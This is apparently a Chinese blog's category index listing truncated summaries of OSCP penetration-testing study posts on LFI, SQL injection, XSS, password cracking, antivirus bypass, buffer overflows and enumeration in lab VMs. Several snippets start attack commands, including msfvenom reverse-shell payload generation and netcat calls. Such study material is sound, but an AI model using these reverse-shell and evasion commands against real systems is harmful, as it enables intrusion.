随笔分类 - 艺术
摘要:OSCP Security Technology - Local File Inclusion(LFI) PHP include and post exploitation https://www.vulnhub.com/entry/pentester-lab-php-include-and-pos
阅读全文
摘要:OSCP Security Technology - SQL Injection(SQLi) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Exploit
阅读全文
摘要:OSCP Security Technology - Cross-Site Scripting(XSS) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Ex
阅读全文
摘要:OSCP Security Technology - Pre-Exploit Password Attacks Tools 1) ncrack kali@kali:~$ ncrack Ncrack 0.7 ( http://ncrack.org ) Usage: ncrack [Options] {
阅读全文
摘要:OSCP Security Technology - Antivirus Bypassing Detection Platform: https://www.virustotal.com/gui/ Shell1 msfvenom -p windows/shell_reverse_tcp LHOST=
阅读全文
摘要:OSCP Security Technology - Java Applet Attack Prepare a target virtual machine - IE11 on Win 7. Set the security level of IE to low, and add a excepti
阅读全文
摘要:OSCP Security Technology - Client Side Attacks Tool: setoolkit setoolkit S1 --> 1) Social-Engineering Attacks S2 --> 2) Website Attack Vectors S3 -->
阅读全文
摘要:OSCP Security Technology - Modifying Shellcode Generate a shellcode with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444
阅读全文
摘要:OSCP Security Technology - Compiling an Exploit Search "samba 2.2.1a exploit". Download the source code file from the following website. https://www.e
阅读全文
摘要:OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux's IP) msfvenom -p windows/shell_reverse_
阅读全文
摘要:OSCP Security Technology - Finding the Right Module Download Mona module and set immunity debugger configuration. https://github.com/corelan/mona Open
阅读全文
摘要:OSCP Security Technology - Finding Bad Characters Finding bad characters with immunity debugger. nano badchars.py chmod 777 badchars.py #!/usr/bin/pyt
阅读全文
摘要:OSCP Security Technology - Finding the Offset Create and copy pattern. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 Create
阅读全文
摘要:OSCP Security Technology - Fuzzing Download vulnserver from the grey corner website. https://thegreycorner.com/vulnserver.html Download immunity debug
阅读全文
摘要:OSCP Security Technology - Buffer Overflows Anatomy of Memory Anatomy of the Stack
阅读全文
摘要:OSCP Security Technology - Netcat Netcat Download Netcat for windows from following website. https://eternallybored.org/misc/netcat/ nc -nv 192.168.2.
阅读全文
摘要:OSCP Security Technology - Enumeration(3) DNS Enumeration host -t ns zonetransfer.me host -t mx zonetransfer.me host zonetransfer.me host -l zonetrans
阅读全文
摘要:OSCP Security Technology - Enumeration(2) SMB Enumeration We found the tcp port 111 is open from the scanning result. locate smb.conf nano /etc/samba/
阅读全文
摘要:OSCP Security Technology - Enumeration(1) Install Kioptrix Level 1 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ Find the IP address of Kioptri
阅读全文
摘要:OSCP Security Technology - Network Scanning(2) Scanning with Nessus https://www.tenable.com/downloads/nessus?loginAttempted=true#nessus-8.14.0 sudo dp
阅读全文
浙公网安备 33010602011771号